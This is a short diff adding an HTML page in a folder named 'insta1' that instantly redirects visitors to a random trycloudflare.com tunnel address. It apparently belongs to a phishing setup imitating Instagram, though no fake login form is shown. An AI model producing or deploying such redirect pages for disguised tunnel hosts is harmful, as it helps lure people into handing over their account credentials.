--- a/insta1/index.html
+++ b/insta1/index.html
@@ -1,1 +1,11 @@
 
+<!DOCTYPE html>
+<html>
+  <head>
+    <meta http-equiv="refresh" content="0; url=https://strap-tracking-msie-criticism.trycloudflare.com" />
+    <title>Redirecting...</title>
+  </head>
+  <body>
+    <p>If you are not redirected, <a href="https://strap-tracking-msie-criticism.trycloudflare.com">click here</a>.</p>
+  </body>
+</html>
